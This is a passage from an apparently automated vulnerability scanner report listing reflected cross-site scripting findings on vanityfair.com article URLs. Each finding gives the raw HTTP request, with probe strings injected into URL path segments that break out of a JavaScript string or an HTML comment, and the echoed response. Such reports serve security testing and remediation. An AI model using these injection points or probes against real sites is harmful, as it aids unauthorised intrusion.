Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/20104729e'%3b519e2f92600/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:51 GMT
Date: Mon, 29 Nov 2010 16:48:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/20104729e';519e2f92600/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that d
...[SNIP]...

1.179. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 8bf02-->73664d074c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/20108bf02-->73664d074c6/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:56 GMT
Date: Mon, 29 Nov 2010 16:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1164563752]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/20108bf02-->73664d074c6/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html?proxyuri=online%2Fdaily%2F20108bf02--%3E73664d074c6%2F11%2Fnightmare-before-thanksgiving-tim-burton-takes-toronto.html':
escaped absolute
...[SNIP]...

1.180. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload a12b6-->5191f3c441e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11a12b6-->5191f3c441e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:09 GMT
Date: Mon, 29 Nov 2010 16:49:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47885


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1491354772]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11a12b6-->5191f3c441e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html?proxyuri=online%2Fdaily%2F2010%2F11a12b6--%3E5191f3c441e%2Fnightmare-before-thanksgiving-tim-burton-takes-toronto.html':
escaped absolute pa
...[SNIP]...

1.181. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 302a1'%3be04106ebc1e was submitted in the REST URL parameter 4. This input was echoed as 302a1';e04106ebc1e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11302a1'%3be04106ebc1e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:07 GMT
Date: Mon, 29 Nov 2010 16:49:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11302a1';e04106ebc1e/nightmare-before-thanksgiving-tim-burton-takes-toronto.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that driv
...[SNIP]...

1.182. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 9f353-->478b8db9bd1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html9f353-->478b8db9bd1 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:26 GMT
Date: Mon, 29 Nov 2010 16:49:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47881


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
g:
-:[40821919]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html9f353-->478b8db9bd1?proxyuri=online%2Fdaily%2F2010%2F11%2Fnightmare-before-thanksgiving-tim-burton-takes-toronto.html9f353--%3E478b8db9bd1':
escaped absolute path not valid.
->
...[SNIP]...

1.183. http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efe88'%3b3f9e49ed51f was submitted in the REST URL parameter 5. This input was echoed as efe88';3f9e49ed51f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.htmlefe88'%3b3f9e49ed51f HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:22 GMT
Date: Mon, 29 Nov 2010 16:49:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
ipt type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.htmlefe88';3f9e49ed51f',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.184. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f64f3-->e11d1f0ee62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010f64f3-->e11d1f0ee62/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:34 GMT
Date: Mon, 29 Nov 2010 16:48:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1190507511]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010f64f3-->e11d1f0ee62/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html?proxyuri=online%2Fdaily%2F2010f64f3--%3Ee11d1f0ee62%2F11%2Frich-hypocrites-secertly-enjoy-the-meatpacking-district.html':
escaped absolu
...[SNIP]...

1.185. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbc58'%3b20581f0ffed was submitted in the REST URL parameter 3. This input was echoed as cbc58';20581f0ffed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010cbc58'%3b20581f0ffed/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:32 GMT
Date: Mon, 29 Nov 2010 16:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44670


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010cbc58';20581f0ffed/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that
...[SNIP]...

1.186. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24130'%3b44209b0f25b was submitted in the REST URL parameter 4. This input was echoed as 24130';44209b0f25b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/1124130'%3b44209b0f25b/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:54 GMT
Date: Mon, 29 Nov 2010 16:48:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/1124130';44209b0f25b/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dri
...[SNIP]...

1.187. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 9629c-->b819dc14f35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/119629c-->b819dc14f35/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:57 GMT
Date: Mon, 29 Nov 2010 16:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1807793583]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/119629c-->b819dc14f35/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html?proxyuri=online%2Fdaily%2F2010%2F119629c--%3Eb819dc14f35%2Frich-hypocrites-secertly-enjoy-the-meatpacking-district.html':
escaped absolute
...[SNIP]...

1.188. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload c68ab-->08e5cc5b50f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

